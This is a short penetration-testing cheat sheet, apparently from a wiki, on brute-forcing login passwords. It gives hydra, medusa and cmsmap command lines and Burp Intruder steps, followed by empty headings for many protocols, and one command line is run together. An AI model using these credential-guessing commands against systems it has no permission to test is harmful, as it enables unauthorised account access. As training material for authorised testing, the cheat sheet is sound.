Brute-force service password

Web

hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin

Logins

Use Burp suite.

  1. Intecept a login attempt.

  2. Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.

  3. Select your payload, your wordlist.

  4. Click attack.

  5. Look for response-length that differs from the rest.​

HTTP Basic Auth

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10

HTTP - Post Form

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com

Hydra attack http get 401 login with a dictionary

SSH

SNMP

Remote Desktop Protocol

AFP

AJP

Cassandra Apache

CouchDB

FTP

IMAP

IRC

ISCSI

LDAP

Mongo

MySQL

OracleSQL

POP3

PostgreSQL

PPTP

Redis

Rexec

Rlogin

Rsh

http://pentestmonkey.net/tools/misc/rsh-grind​

Rsync

RTSP

SMB

Telnet

VNC

SMTP

Last updated